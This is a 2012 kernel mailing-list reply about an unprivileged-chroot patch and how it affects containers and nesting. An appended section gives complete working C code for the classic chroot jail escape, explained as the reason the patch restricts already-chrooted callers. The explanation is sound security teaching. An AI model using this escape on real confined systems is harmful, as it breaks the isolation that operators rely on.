On Sun, 2012-01-15 at 16:37 -0800, Andy Lutomirski wrote:
> Because chroot is an easy way to break out of chroot jail, CAP_SYS_ADMIN
> is still required if the caller is already chrooted.

This part is pretty gross. It means it won't work for stuff like containers (systemd-nspawn etc.), and furthermore I have plans that involve running OS trees inside a chroot, and this would obviously not work for that.

Incidentally, I ended up putting my setuid program here:
http://git.gnome.org/browse/linux-user-chroot/

Now unfortunately, even if we say that a new setuid program is the way to gain these privileges, you still can't nest it, because all of these things are predicated on disabling setuid programs. But it would at least not fail initially if your process was inside a chroot.
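The escape that the quoted patch text alludes to ("chroot is an easy way to break out of chroot jail"), as an added example that is not part of the thread, of the patch, or of linux-user-chroot. It jails the calling process in a fresh directory the proper way (chroot followed by chdir into the new root), then walks back out using nothing but chroot() and chdir(".."), which is exactly why an already-chrooted caller cannot be allowed an unprivileged chroot(). It assumes Linux, a writable /tmp and CAP_SYS_CHROOT (run it as root); without that privilege it reports "not permitted" and changes nothing. The function names same_inode, climb_out and chroot_escape_demo are mine.

```c
/* Added example, not code from the thread or from linux-user-chroot.
 * Demonstrates the classic chroot() escape: a process that is already
 * chrooted but may still call chroot() can climb back to the real root.
 * Assumes Linux, a writable /tmp and CAP_SYS_CHROOT; without the
 * capability it reports "not permitted" and leaves the process untouched.
 * same_inode, climb_out and chroot_escape_demo are names chosen here. */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* 1 if a and b resolve to the same inode, 0 if not, -1 if either stat fails. */
int same_inode(const char *a, const char *b)
{
    struct stat sa, sb;
    if (stat(a, &sa) != 0 || stat(b, &sb) != 0)
        return -1;
    return (sa.st_dev == sb.st_dev && sa.st_ino == sb.st_ino) ? 1 : 0;
}

/* Does stat(path) name the saved (dev, ino) pair?  1 yes, 0 no, -1 error. */
static int is_inode(const char *path, dev_t dev, ino_t ino)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (st.st_dev == dev && st.st_ino == ino) ? 1 : 0;
}

/* Climb out of the current root and pin the real one. This works because
 * chroot() does not move the cwd: after chroot("esc") the cwd is still the
 * parent of the new root, so ".." is never clamped at the root and keeps
 * climbing until it reaches the real "/". Returns 0 on success, -1 on a
 * syscall failure. */
static int climb_out(void)
{
    if (mkdir("esc", 0700) != 0 && errno != EEXIST)
        return -1;
    if (chroot("esc") != 0)          /* deliberately no chdir("esc") */
        return -1;
    for (int i = 0; i < 64; i++)     /* more than any realistic nesting depth */
        if (chdir("..") != 0)
            return -1;
    return chroot(".");              /* root := wherever the climb ended */
}

/* Jail ourselves in a fresh directory, then escape.
 * Returns 0 if we end up back at the original root, 1 if still confined,
 * 2 if chroot() is not permitted (no CAP_SYS_CHROOT), -1 on other failure. */
int chroot_escape_demo(void)
{
    struct stat real_root;
    char jail[] = "/tmp/jailXXXXXX";

    if (stat("/", &real_root) != 0)
        return -1;
    /* Privilege probe that changes nothing: "/" resolves to the current
     * root, so chroot("/") leaves the root where it is. */
    if (chroot("/") != 0)
        return (errno == EPERM) ? 2 : -1;
    if (mkdtemp(jail) == NULL)
        return -1;

    /* The jailer does it properly: chroot, then chdir into the new root. */
    if (chroot(jail) != 0 || chdir("/") != 0)
        return -1;
    if (is_inode("/", real_root.st_dev, real_root.st_ino) != 0)
        return -1;                   /* not actually confined; demo is moot */

    if (climb_out() != 0)
        return -1;

    /* Best-effort cleanup; the paths resolve again now that root is real "/". */
    char esc[sizeof jail + 4];
    snprintf(esc, sizeof esc, "%s/esc", jail);
    rmdir(esc);
    rmdir(jail);

    return is_inode("/", real_root.st_dev, real_root.st_ino) == 1 ? 0 : 1;
}

int main(void)
{
    int r = chroot_escape_demo();
    printf("%s\n", r == 0 ? "escaped to the real root"
                 : r == 1 ? "still confined"
                 : r == 2 ? "chroot() not permitted; run with CAP_SYS_CHROOT"
                          : "failed");
    return r < 0;
}
```

Run as root and it reports that it escaped; run unprivileged and it only reports that chroot() is not permitted. The unprivileged chroot the patch proposes would turn the second outcome into the first for any process that is merely chrooted, which is why the patch keeps the CAP_SYS_ADMIN requirement for already-chrooted callers, and why that requirement is what breaks nesting in the reply above. Confinement that must survive a second chroot() call has to come from a mount namespace with pivot_root, not from chroot alone.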